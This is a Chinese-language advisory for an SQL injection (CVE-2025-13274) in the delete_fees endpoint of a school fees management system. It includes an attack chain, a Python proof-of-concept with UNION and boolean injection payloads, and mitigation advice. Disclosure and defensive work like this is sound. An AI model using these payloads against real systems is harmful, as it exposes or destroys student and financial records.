CVE-2025-13274 Campcodes学校收费管理系统delete

漏洞信息

漏洞编号

CVE-2025-13274

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Campcodes School Fees Payment Management System 1.0

漏洞概述

CVE-2025-13274是Campcodes School Fees Payment Management System 1.0版本中存在的SQL注入漏洞。该系统是一款用于学校收费管理的Web应用程序，广泛应用于教育机构进行学生费用管理。漏洞位于ajax.php文件中的delete_fees功能模块，攻击者可以通过操纵ID参数实现SQL注入攻击。由于该漏洞可通过远程网络利用，且只需要低权限认证即可实施攻击，因此存在被恶意利用的风险。攻击者利用此漏洞可以绕过认证机制，非法访问、修改或删除数据库中的敏感信息，包括学生个人信息、财务数据等。该漏洞的利用代码已公开披露，增加了实际攻击的可能性。建议受影响用户尽快采取防护措施，避免遭受安全威胁。

技术细节

Campcodes School Fees Payment Management System 1.0的ajax.php文件存在SQL注入漏洞，具体位于delete_fees功能模块。漏洞产生的根本原因在于应用程序对用户输入的ID参数缺乏有效的输入验证和SQL语句预处理。攻击者可以通过构造恶意的SQL payloads，在HTTP请求中注入额外的SQL语句，从而实现对数据库的非授权操作。漏洞利用方式为：通过GET或POST请求向/ajax.php?action=delete_fees端点发送包含恶意SQL代码的ID参数。例如，攻击者可以使用UNION SELECT、布尔盲注或时间盲注等技术提取数据库中的敏感信息。在某些配置下，攻击者甚至可能通过UNION注入获取操作系统shell权限。漏洞影响范围包括学生信息表、财务记录表等敏感数据。由于该接口通常需要低权限认证即可访问，攻击门槛相对较低。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标系统使用的Campcodes School Fees Payment Management System，并确定ajax.php端点存在且可访问

STEP 2

步骤2：认证绕过或低权限访问

攻击者使用低权限账号登录系统或通过其他方式获取有效的session cookie

STEP 3

步骤3：构造恶意请求

攻击者构造包含SQL注入payload的HTTP请求，目标端点为/ajax.php?action=delete_fees，参数ID包含恶意SQL代码

STEP 4

步骤4：注入执行

发送恶意请求，服务器将用户输入的ID参数直接拼接到SQL查询语句中执行，导致SQL注入攻击成功

STEP 5

步骤5：数据窃取或破坏

攻击者利用UNION注入、布尔盲注或时间盲注等技术提取敏感数据库信息，或修改删除数据

STEP 6

步骤6：持久化控制

在某些配置下，攻击者可能通过SQL注入写入Webshell或获取系统命令执行权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-13274 PoC - Campcodes School Fees Payment Management System SQL Injection
Affected Component: /ajax.php?action=delete_fees (ID parameter)
"""

import requests
import sys

def exploit_sqli(target_url, payload):
    """
    Execute SQL injection attack on delete_fees endpoint
    """
    params = {
        'action': 'delete_fees',
        'id': payload
    }
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None

def extract_db_version(target_url):
    """
    Extract database version using UNION-based injection
    """
    payload = "1 UNION SELECT NULL,version(),NULL,NULL---"
    result = exploit_sqli(target_url, payload)
    if result:
        print("[*] Database version extraction successful")
        return result
    return None

def blind_sqli_test(target_url):
    """
    Test for blind boolean-based SQL injection
    """
    true_payload = "1 AND 1=1"
    false_payload = "1 AND 1=2"
    
    true_resp = exploit_sqli(target_url, true_payload)
    false_resp = exploit_sqli(target_url, false_payload)
    
    if true_resp != false_resp:
        print("[+] Blind SQL injection confirmed")
        return True
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13274.py <target_url>")
        print("Example: python cve-2025-13274.py http://target.com/ajax.php")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Testing CVE-2025-13274 on {target}")
    
    # Test blind SQL injection
    if blind_sqli_test(target):
        print("[+] Target is vulnerable to SQL injection")
        
    # Extract database version
    version_info = extract_db_version(target)
    if version_info:
        print(f"[*] Version info: {version_info}")

影响范围

Campcodes School Fees Payment Management System 1.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）禁用或限制delete_fees功能的访问权限；2）实施IP白名单访问控制；3）在Web应用层部署SQL注入防护规则；4）加强数据库操作日志监控；5）对关键业务数据实施定期备份；6）考虑使用ModSecurity等开源WAF规则进行临时防护。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13274
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13274
3 Details https://www.cvedetails.com/cve/CVE-2025-13274/
4 VulDB https://vuldb.com/cve/CVE-2025-13274
5 Link https://github.com/ASantsSec/CVE/issues/21
6 Link https://vuldb.com/?ctiid.332609
7 Link https://vuldb.com/?id.332609
8 Link https://vuldb.com/?submit.690886
9 Link https://www.campcodes.com/

CVE-2025-13274 Campcodes学校收费管理系统delete_fees接口SQL注入漏洞